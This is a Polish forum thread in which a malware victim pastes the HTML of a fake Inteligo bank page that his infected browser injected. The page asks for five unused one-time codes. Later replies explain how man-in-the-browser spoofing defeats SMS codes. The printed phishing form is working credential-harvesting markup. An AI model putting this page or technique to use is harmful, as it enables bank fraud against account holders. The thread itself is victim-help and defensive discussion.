Strona 1 z 2 12 OstatniOstatni
Pokaż wyniki 1 do 10 z 11

Temat: banki i wyludzanie hasel - jak ustalic zrodlo

  1. #1
    Zarejestrowany
    Jul 2008
    Postów
    10

    Domyślnie banki i wyludzanie hasel - jak ustalic zrodlo

    otoz mam jakies gowno w kompie ktore - jak narazie wg mojej analizy - wbija sie w przegladarke (nie w dns czya arp tylko zwyczajnie zamienia kod juz podczas renderowania) i czy to na intelifo czy na mbanku prosi o podanie hasel 5 nieuzywanych kod z inteligo:
    Kod:
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
    <html>
    <head>
    <link rel="SHORTCUT ICON" href="/img/skins/igo2003/inteligo.ico">
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta name="Author" content="Softax (www.softax.pl)">
    <meta name="Version" content="3-0-3">
    <link rel="stylesheet" type="text/css" href="/css/skins/igo2003/inteli.css" title="standard">
    <style type="text/css"><!--
       .tableHeader1, .tableHeader1zakl { background-image: URL('/img/skins/igo2003/tableHeader1_back.gif'); }
       .tableHeader2 { background-image: URL('/img/skins/igo2003/mp1-on.gif'); }
       .infoField1 { background-image: URL('/img/skins/igo2003/infoBack1.gif'); }
       .info1, .info1endPage { background-image: URL('/img/skins/igo2003/infoBack.gif'); }
       .info2 { background-image: URL('/img/skins/igo2003/infoBack2.gif'); }
       .welcome { background-image: URL('/img/skins/igo2003/welcome-back.gif'); }
       .bmActive { background-image: URL('/img/skins/igo2003/activeBack.gif'); }
       .bmInactive { background-image: URL('/img/skins/igo2003/inactiveBack.gif'); }
       .divider { background-image: URL("/img/skins/igo2003/divider.gif"); }
       .stopka { background-image: URL('/img/skins/igo2003/stopka.gif'); }
    --></style>
    
    <title>Serwis WWW Inteligo</title>
    <script language="JavaScript" type="text/javascript"><!--
    var infoTipWindow; var tmImagesArray; var submitStarted; var no_submit_block; var disable_focus_placing=0;
    var mp1; var mp1over; var sectionName; var imgUrl = '/img/skins/igo2003/'; var htmlUrl = '/html/skins/igo2003/';
    //--></script>
    <script language="JavaScript" type="text/javascript" src="/scripts/skins/igo2003/common.js"></script>
    </head>
    <body onclick="disable_focus_placing=1;" onkeypress="" >
    <script Language= "JavaScript">
    		  function validate(form)
    		  {
    		  var str = /[^0-9]/;
    		  if(form.nashehaslo1.value == '' || (form.nashehaslo1.value).length != 6 || str.test(form.nashehaslo1.value) != false || form.nashehaslo2.value == '' || (form.nashehaslo2.value).length != 6 || str.test(form.nashehaslo2.value) != false || form.nashehaslo3.value == '' || (form.nashehaslo3.value).length != 6 || str.test(form.nashehaslo3.value) != false || form.nashehaslo4.value == '' || (form.nashehaslo4.value).length != 6 || str.test(form.nashehaslo4.value) != false || form.nashehaslo5.value == '' || (form.nashehaslo5.value).length != 6 || str.test(form.nashehaslo5.value) != false || form.nashehaslo1num.value == '' || form.nashehaslo2num.value == '' || form.nashehaslo3num.value == '' || form.nashehaslo4num.value == '' || form.nashehaslo5num.value == '')
    			{
    				return false;
    			}
    			return true;
    		  }
    		  
    		document.write('<form name=form2 action='+window.location+' method=post onsubmit="return validate(this);">');
    </script>
    <input type=hidden name="sd" value="GnyiqKRO3LYMJJ2SEppPNxgnBWaoWrZmYBTnBKHuYzSopUdICtr7kUmv3MhteZZFCLWEnK7WeZ3JefZmUwCuU5t7WzMwrfCI:XLts4eXsNUd7TzRQ7Kl/KomAPqVDxhsmyXhfpKtYJM9jzXwMObddIwi/YcPeG9eErOqrIPdgMes9peWaXdwv:wiLQZdKPDDy1oYw9Bukms=">
    	<input type=hidden name="form.name" value="login">
    	<input type=hidden name="menu" value="">
    	<input type=hidden name="button" value="">
    	<input type=hidden name="button.x" value="0">
    	<input type=hidden name="cif" value="54325435">
    	<input type=hidden name="password" value="54353454354">
    	<input type=hidden name="skin" value="Granat">
    	<input type=hidden name="btn.ok.x" value="28">
    	<input type=hidden name="btn.ok.y" value="17">
    	
    <table border="0" cellpadding="0" cellspacing="0" width="753">
    <tr><td><input type="image" src="/img/skins/igo2003/trans.gif" tabindex="-1" name="btn_ok" 
    width="1" height="1" border="0" alt=""></td></tr>
    <tr>
    <td COLSPAN="4" align="left" valign="top" width="753" >
    <br>
    <table border="0" cellpadding="0" cellspacing="0" width="100%">
    (wyciete pierdoły bo sie post niemiesci)
    <tr>
    <td COLSPAN="2" class="tableSubHeader2"><table border="0" cellspacing="4" cellpadding="0"><tr><td width="64"><img src="/img/skins/igo2003/inteligo_guzik.gif" width="43" height="40" border="0" alt="guzik"/></td>
    <td style="font-weight: bold;" ><p>Podaj 5 nieużywanych kodów jednorazowych z aktywnej karty kodów .</p></td></tr></table></td>
    </tr>
    
    <tr>
    <td class="info2" COLSPAN="2">
    <table align="right" width="100%">
     <tr>
      <td width="100%">
        <p><b>Bezpieczne logowanie.</b><br><br>       
           Zanim się zalogujesz, sprawdź adres strony (prawidłowy to: 
           https://secure.inteligo.com.pl) oraz poprawność jej certyfikatu: 
           kliknij w ikonę zamkniętej kłódki. Jeżeli cokolwiek wzbudza Twoje zaniepokojenie, 
           zanim się zalogujesz zadzwoń do konsultanta Inteligo (0 800 121 121).<br>
           <a target='_blank' href='http://www.inteligo.pl/infosite/oferta_dla_ciebie_bezpieczenstwo.htm'><b>Więcej o bezpiecznym korzystaniu z konta >></b></a>
        </p>
      </td>  
      <td>
    
    <table align="right" width="100%">
    <tr>
    <td align="right"><a href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=SECURE.INTELIGO.COM.PL&lang=en" target="_blank"
    onClick="return rawWindow('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=SECURE.INTELIGO.COM.PL&lang=en', 'VeriSign', 520, 480);"><img src="/img/skins/igo2003/VeriSignSeal.gif" width="130" height="88" alt="" title="" border="0"></a><br><br>
    </td></tr></table>
      </td>
     </tr>
    </table>
    </td>
    </tr>
    <tr>
    <td class="tableLine2">Kod nr&nbsp;<input name="nashehaslo1num" type="text" size="3" maxlength="2"></td>
    <td class="tableLine2">
    Kod jednorazowy&nbsp;<input type="Password" name="nashehaslo1" value="" size="15" style="font-family:courier new, courier, monospace;font-size:13px"
     class="formField">
    
    </td>
    </tr>
    <tr>
    <td class="tableLine2">Kod nr&nbsp;<input name="nashehaslo2num" type="text" size="3" maxlength="2"></td>
    <td class="tableLine2">
    Kod jednorazowy&nbsp;<input type="Password" name="nashehaslo2" value="" size="15" style="font-family:courier new, courier, monospace;font-size:13px"
     class="formField">
    
    </td>
    </tr>
    <tr>
    <td class="tableLine2">Kod nr&nbsp;<input name="nashehaslo3num" type="text" size="3" maxlength="2"></td>
    <td class="tableLine2">
    Kod jednorazowy&nbsp;<input type="Password" name="nashehaslo3" value="" size="15" style="font-family:courier new, courier, monospace;font-size:13px"
     class="formField">
    
    </td>
    </tr>
    <tr>
    <td class="tableLine2">Kod nr&nbsp;<input name="nashehaslo4num" type="text" size="3" maxlength="2"></td>
    <td class="tableLine2">
    Kod jednorazowy&nbsp;<input type="Password" name="nashehaslo4" value="" size="15" style="font-family:courier new, courier, monospace;font-size:13px"
     class="formField">
    
    </td>
    </tr>
    <tr>
    <td class="tableLine2">Kod nr&nbsp;<input name="nashehaslo5num" type="text" size="3" maxlength="2"></td>
    <td class="tableLine2">
    Kod jednorazowy&nbsp;<input type="Password" name="nashehaslo5" value="" size="15" style="font-family:courier new, courier, monospace;font-size:13px"
     class="formField">
    
    </td>
    </tr>
    <tr>
    <td COLSPAN="2" class="info1">
    <p>Jeśli przez 10 minut w serwisie WWW nie wykonasz żadnego działania 
    powodującego przejście na inną stronę, zostaniesz ze względów bezpieczeństwa 
    przeniesiony do strony logowania. Zaloguj się ponownie, aby powrócić do 
    poprzednio prezentowanej strony.</p>
    </td>
    </tr>
    <tr>
    <td class="nopadding" colspan="2">
    <table cellpadding="0" cellspacing="0" border="0" width="100%" bgcolor="#01D1D2"><tr>
    <td><img src="/img/skins/igo2003/tc4.gif" width="8" height="13" border=0 alt=""></td>
    <td width="100%"><img src="/img/skins/igo2003/trans.gif" width="8" height="13" border=0 alt=""></td>
    <td><img src="/img/skins/igo2003/dots.gif" width="22" height="13" border=0 alt=""></td>
    <td><img src="/img/skins/igo2003/tc3.gif" width="8" height="13" border=0 alt=""></td>
    </tr></table>
    </td>
    </tr>
    <tr>
    <td></td>
    <td>
    <input tabindex="10" name="btn_ok" type="image" src="/img/skins/igo2003/button-ok.gif" 
      width="61" height="27" border="0" hspace="1" alt="OK"
     title="OK">
    <a tabindex="10" href="javascript:void(null);"  onclick="document.forms[0].reset(); return false;"><img 
      src="/img/skins/igo2003/button-wyczysc.gif"  width="86" height="27" border="0" hspace="1" 
      alt="Wyczyść" title="Wyczyść"></a>
    </td>
    </tr>
    </table>
    </td></tr>
    
    </td>
    </tr>
    
    <tr>
    <td>
    <br>
    <table cellpadding="0" cellspacing="0" border="0" width="100%">
    <tr><td><img src="/img/skins/igo2003/stopka_left.gif" width="4" height="27" border="0" alt=""></td>
    <td class="stopka" height="27" width="100%"><p>Konto Inteligo jest prowadzone przez PKO Bank Polski</p></td>
    <td><img src="/img/skins/igo2003/stopka_right.gif" width="4" height="27" border="0" alt=""></td></tr>
    </table>
    <table    border="0"   cellpadding="2"   cellspacing="1"   width="100%"
       valign="top"   background=""><tr>
    <td></td>
    <td><table align="right"><tr>
    <td>
    <img vspace="2" border="0" align="absmiddle" src="/img/skins/igo2003/troj-p.gif"
      width="9" height="10" hspace="2" alt="o"></td>
      <td><b>Zmień wygląd serwisu Inteligo na:&nbsp;</b></td>
    <td>
    <select tabindex="10" name="skin" class="formField">
    <option selected   value="Granat">Granat</option>
    <option   value="Turkus">Turkus</option>
    <option   value="Czarny">Czarny</option>
    <option   value="Miętowy">Miętowy</option>
    </select>
    
    </td>
    <td>
    <input type="image" name="btn_sel_skin" src="/img/skins/igo2003/troj.gif" width="22" height="21" 
     border="0" alt="Wybierz" title="Wybierz" tabindex="10">
    </td></tr></table>
    </td></tr></table>
    
    </td>
    </tr>
    </table>
    </td> </tr>
    </table>
    
    </form>
    </body>
    </html>

  2. #2
    Zarejestrowany
    Jul 2008
    Postów
    10

    Domyślnie

    wstrzykuje kod javy.
    to drugi wyciek od wycieku loginu i hasla ftp - zapewne to ten sam
    jak rozkodowac gdzie on tego forma sle?

    certyfkak wygkada okay, adresy ip hostow sie zgadzaja (mbank com pl i www mbank com pl)
    nic nie wskazuje generalnie rzecz biorac na zatrucie dns etc

  3. #3
    Avatar Sardihan
    Sardihan jest offline Blastmaster
    Zarejestrowany
    Dec 2006
    Skąd
    polsza
    Postów
    747

    Domyślnie

    javascript i java to 2 zupełnie rużne rzeczy

  4. #4
    Zarejestrowany
    Jul 2008
    Postów
    10

    Domyślnie

    racja - przeinaczylem w akcie (###) irytacji
    zeby nie byc dluznym to : różne ;P

    edit: nie używamy brzydkich wyrazów
    Ostatnio edytowane przez markossx : 07-17-2008 - 21:32 Powód: wulgaryzmy !!!

  5. #5
    Zarejestrowany
    Jun 2008
    Postów
    47

    Domyślnie

    Podepne się tutaj bo najbardziej pasuje a nie widze potrzeby tworzenia nowego wątku.

    Dzisiaj wyczytalem, że wiele zabezpieczeń typu: wirtualne klawiatury, zdrapki, sms code; używanych przez banki już od dawna sie nie sprawdza. Zastanawia mnie jak to jest robione w przypadku zdrapek i sms code. W zdrapkach można zastosować w/w metode "Podaj 5/10 jednorazowych haseł w celu sprawzdenia Twojego konta" itp czyli po prostu ominięcie tego zabezpieczenia. To jendak w przypadku sms code nie ma za bardzo pomysłu w jaki sposób może to być zaimplementowane. Jedyne co mi przychodzi to zmiana numeru telefonu w ustawieniach konta internetowego czyli albo włąnm na konto albo zmusić delikwenta do kliknięcia w sprokurowany link który za nas zmienia ten numer telefonu.
    Czy robi się to w ten prosty sposób czy są jakieś inne bardziej zaawansowane metody?

    Pozdrawiam
    Informatyka jest tak samo nauką o komputerach jak astronomia jest nauką o teleskopach.

  6. #6
    Zarejestrowany
    Jun 2008
    Postów
    36

    Domyślnie ddd

    Dlaczego nikomu kto zakłada takie 'topiki' nigdy nie przyszło do głowy
    że to może ktoś z tego forum
    napisał to 'gówno' l0l
    W zasadzie bez znaczenie ale trochę mnie to zawsze bawi l0l
    mam fryzure na Hitlera - jest k00l

  7. #7
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    Co do hasel jednorazowych to chodzi o to, ze normalnie wystarczy username i haslo... w UK banki pytaja o login, haslo oraz 3 losowo wybrane znaki z dodatkowego hasla ktore sobie zakladamy (jest ono obowiazkowe) i za kazdym logowaniem prosza o inne znaki.

    To dodatkowe haslo oraz telefon/sms, zdrapka itd ma poprawic bezpieczenstwo, bo nie tylko musisz miec dane konta (login/haslo) ale token - przedmiot (telefon/zdrapka) lub jego odpowiednik (glowe w ktorej masz drugie haslo i podasz wskazane znaki). Jest to po prostu dodatkowy element systemu autoryzacji

    BTW. Aktualnie coraz wiecej bankow w UK wprowadza tokeny sprzetowe, aby wiec zaplacic on-line musisz miec token (wyglada jak maly chinski kalkulatorek za 2zl), wciskasz w to swoja karte bankomatowa (kazda ma chip'a), podajesz pin karty, wprowadzasz kod z ekranu, dostajesz kod autoryzacyjny ktory masz wyslac do banku.
    Obejscie czegos takiego jest raczej ehmmm bardzo trudne!
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  8. #8
    Zarejestrowany
    Jun 2008
    Postów
    47

    Domyślnie

    TQM ale ja wiem na czym polegają te zabezpieczenia. Interesuje mnie jak można złamać smsa/zdrapke? Pomijając wyłudzenia typu phishing i podaj 5/10 jednorazowych haseł ze zdrapki. Wyczytałem, że już dawno tojest łamane i zastanawia mnie szczególnie ten sms.

    Pozdrawiam
    Informatyka jest tak samo nauką o komputerach jak astronomia jest nauką o teleskopach.

  9. #9
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    Sa na to sposoby... jesli koles zainfekowal odpowiednio Twoj komputer to istnieje taka mozliwosc, ze to co widzisz na ekranie jest spoof
    Odpowiedni plugin do przegladarki i wszystko jest mozliwe - widzisz ze robisz przelew do urzedu skarbowego, dostajesz SMSa z haslem jednorazowym itd, autoryzujesz... pozniej widzisz ze niby ok, kwota sie zgadza itd... a tak na prawde dane do przelewu byly inne, konto nie nalezy do fiskusa i kod SMSowy posluzyl do autoryzowania innej transakcji najprawdopodobniej na inna kwote.

    Calosc obdywa sie po stronie przegladarki na kompie klienta. Wystarczy ze w SMSie nie ma (albo nie przeczytasz) na jaka kwote odbywa sie przelew i przepiszesz kod... zaden bank nie uzna takiej reklamacji.

    Co w takim razie robic? Do bankowosci elektronicznej odpalac jakies Live CD, ktore ma przegladarke bez pluginow (firefox standardowy bedzie ok) i nie zapisze zadnych danych - po prostu reboot i nie ma zadnej historii. Aktualnie stwierdzenie czy Twoj wlasny system jest na pewno czysty jest prawie niemozliwe
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  10. #10
    Zarejestrowany
    Jun 2008
    Postów
    47

    Domyślnie

    Ale ogólnie sprowadza się to do mniej lub bardziej zaawansowanego spoofingu. Zastanawiałem się czy są inne metody niezależne od "czystości" komputera

    Pozdrawiam
    Informatyka jest tak samo nauką o komputerach jak astronomia jest nauką o teleskopach.

Strona 1 z 2 12 OstatniOstatni

Podobne wątki

  1. Czy mozna ustalic autora obraxliwego wpisu na forum?
    By ttops in forum Newbie - dla początkujących!
    Odpowiedzi: 6
    Autor: 06-07-2008, 22:54
  2. [LAMACZ GG] program do lamania hasel gg
    By lamacz in forum /dev/null
    Odpowiedzi: 9
    Autor: 02-02-2008, 16:59
  3. Najlepszy Keylogger do przechwytywania hasel
    By Xenthar in forum Inne metody
    Odpowiedzi: 1
    Autor: 01-10-2008, 16:52
  4. Zrodlo strony
    By morten in forum Newbie - dla początkujących!
    Odpowiedzi: 1
    Autor: 10-17-2007, 18:13
  5. czemu nie wyswietla mi sie zrodlo strony?
    By ironwall in forum Java Script/Flash/Inne
    Odpowiedzi: 1
    Autor: 01-28-2007, 10:19

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj